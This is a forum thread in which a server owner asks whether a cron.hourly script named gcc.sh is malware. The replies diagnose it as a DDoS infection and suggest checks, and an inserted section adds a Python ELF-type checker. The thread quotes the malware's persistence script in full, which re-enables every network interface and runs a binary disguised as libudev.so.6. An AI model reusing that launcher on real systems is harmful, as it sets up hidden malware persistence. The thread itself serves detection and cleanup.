Is this file (gcc.sh) in cron.hourly malware?

I have been experiencing spikes up to 1 Gbps on my server and have been looking for viruses and malware. I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. Thanks!

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
# bring up every interface listed in /proc/net/dev, each in the background
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
# copy the dropped file to a library-looking name, then run it as a program
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.

Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver. And yes, that's a DDoS virus on a unix system, exactly matching your problem.
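The two checks the answer above suggests (is /lib/libudev.so.6 really a program rather than a shared library, and is /lib/libudev.so a regular file instead of the usual symlink) can be automated by reading the ELF header's e_type field. This is an added example, not code from the post; the ELF headers it builds for its self-test are constructed stand-ins, and the function names are my own.

```python
import struct
import tempfile
from pathlib import Path

# Added example: a shared library is normally ET_DYN; a program hidden under a library name is ET_EXEC.
ELF_MAGIC = b"\x7fELF"
E_TYPE_NAMES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}


def elf_type(header):
    """Return the e_type name from the first bytes of a file, or None if not ELF."""
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        return None
    endian = "<" if header[5] == 1 else ">"  # EI_DATA: 1 little-endian, 2 big-endian
    (e_type,) = struct.unpack(endian + "H", header[16:18])  # offset 16 in ELF32 and ELF64
    return E_TYPE_NAMES.get(e_type, "ET_UNKNOWN")


def check_libudev(lib_dir):
    """List suspicious facts about libudev.so and libudev.so.6 under lib_dir."""
    so, so6 = Path(lib_dir) / "libudev.so", Path(lib_dir) / "libudev.so.6"
    findings = []
    # libudev.so is normally a symlink to the versioned file; the cron script needs a regular file to copy
    if so.exists() and not so.is_symlink():
        findings.append(f"{so} is a regular file, not a symlink")
    if so6.exists():
        with open(so6, "rb") as f:
            kind = elf_type(f.read(64))
        if kind == "ET_EXEC":
            findings.append(f"{so6} is an ET_EXEC program, not a shared library")
        elif kind is None:
            findings.append(f"{so6} is not an ELF file")
    return findings


def fake_elf_header(e_type, little_endian=True):
    """Constructed 64-byte ELF64 header for the self-test; not a real binary."""
    endian = "<" if little_endian else ">"
    ident = ELF_MAGIC + bytes([2, 1 if little_endian else 2, 1]) + bytes(9)
    return ident + struct.pack(endian + "HH", e_type, 0x3E) + bytes(44)


def simulate(infected):
    """Build a throwaway lib dir (infected or clean layout) and run the check on it."""
    with tempfile.TemporaryDirectory() as d:
        d = Path(d)
        if infected:  # layout the cron script leaves behind: two regular ET_EXEC files
            (d / "libudev.so").write_bytes(fake_elf_header(2))
            (d / "libudev.so.6").write_bytes(fake_elf_header(2))
        else:  # normal layout: versioned ET_DYN library plus a symlink to it
            (d / "libudev.so.6").write_bytes(fake_elf_header(3))
            (d / "libudev.so").symlink_to("libudev.so.6")
        return check_libudev(d)
```

Run check_libudev("/lib") on the suspect host; note that a position-independent executable is also ET_DYN, so a clean result from the e_type check alone does not prove the file is a library, while an ET_EXEC result under a library name is a clear signal.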

Yes, it is.

Try using ps -ef | grep -i libudev.so.6 to see the processes used by the program.
